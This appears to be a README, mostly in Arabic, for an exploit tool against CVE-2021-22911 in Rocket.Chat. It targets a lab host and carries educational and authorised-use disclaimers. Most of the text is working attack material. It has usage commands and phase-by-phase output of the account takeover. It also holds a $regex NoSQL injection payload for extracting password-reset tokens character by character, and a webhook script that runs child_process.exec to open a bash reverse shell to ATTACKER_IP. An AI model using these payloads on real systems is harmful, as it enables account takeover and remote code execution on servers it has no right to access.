
CVE-2021-22911 Rocket.Chat NoSQL Injection RCE Exploit - لأغراض تعليمية
هذا الاستغلال مخصص لأغراض اختبار الاختراق المصرح به والتعليم فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. المؤلف غير مسؤول عن أي إساءة استخدام.
CVE-2021-22911 هي ثغرة حرجة للحقن في NoSQL بدون مصادقة في Rocket.Chat تؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE).
يستغل هذا الاستغلال ثلاث هجمات حقن NoSQL معًا:
$regex لاستخراج رمز إعادة تعيين كلمة المرور حرفًا بحرفchild_process.exec() لتشغيل قشرة عكسيةpip install requests
nc -lvnp 4444
إدخال IP يدويًا:
python3 rocket_chat_exploit.py \
-u [email protected] \
-a [email protected] \
-t http://chat.rocket.thm \
-i 10.9.0.1 \
-p 4444
اكتشاف IP الخاص بـ tun0 تلقائيًا (موصى به):
python3 rocket_chat_exploit.py \
-u [email protected] \
-a [email protected] \
-t http://chat.rocket.thm \
-i $(ip a show tun0 | grep "inet " | awk '{print $2}' | cut -d/ -f1) \
-p 4444
الوسائط:
-u: البريد الإلكتروني لمستخدم منخفض الصلاحيات (يجب أن يكون موجودًا)-a: البريد الإلكتروني للمسؤول-t: عنوان URL الهدف (مثيل Rocket.Chat)-i: IP المهاجم الخاص بك (tun0)-p: منفذ مستمع Netcat============================================================
Rocket.Chat CVE-2021-22911 — RCE
Target : http://chat.rocket.thm
Shell : 10.9.0.1:4444
============================================================
[PHASE 1] Low-priv user → [email protected]
[+] Password reset email sent → [email protected]
[*] Extracting reset token via blind NoSQL injection...
[43/43] aBcDeFgHiJkLmNoPqRsTuVwXyZ1234567890abcd
[+] Token: aBcDeFgHiJkLmNoPqRsTuVwXyZ1234567890abcd
[+] Password changed to: P@$$w0rd!1234
[PHASE 2] Admin user → [email protected]
[+] Password reset email sent → [email protected]
[*] Extracting reset token via blind NoSQL injection...
[43/43] XyZ9876543210aBcDeFgHiJkLmNoPqRsTuVwXyZ
[+] Token: XyZ9876543210aBcDeFgHiJkLmNoPqRsTuVwXyZ
[+] Password changed to: P@$$w0rd!1234
[PHASE 3] RCE
[!] Start your listener now: nc -lvnp 4444
[*] Press Enter when nc is ready...
[+] Authenticated as [email protected]
userid : userid123456789
token : token123456...
[+] Webhook created
http://chat.rocket.thm/hooks/hookid123/token456
[*] Triggering reverse shell...
[+] Trigger sent — check your nc listener
{
"message": {
"msg": "method",
"method": "getPasswordPolicy",
"params": [
{
"token": {
"$regex": "^abc"
}
}
]
}
}
class Script {
process_incoming_request({ request }) {
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec('bash -c "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"');
}
}
هذه الأداة مقدمّة للأغراض التعليمية واختبار الأمان المصرح به فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر جريمة جنائية بموجب قانون الاحتيال وإساءة استخدام الكمبيوتر (CFAA) والقوانين الدولية المماثلة.
استخدمها بمسؤولية. اختبر فقط الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.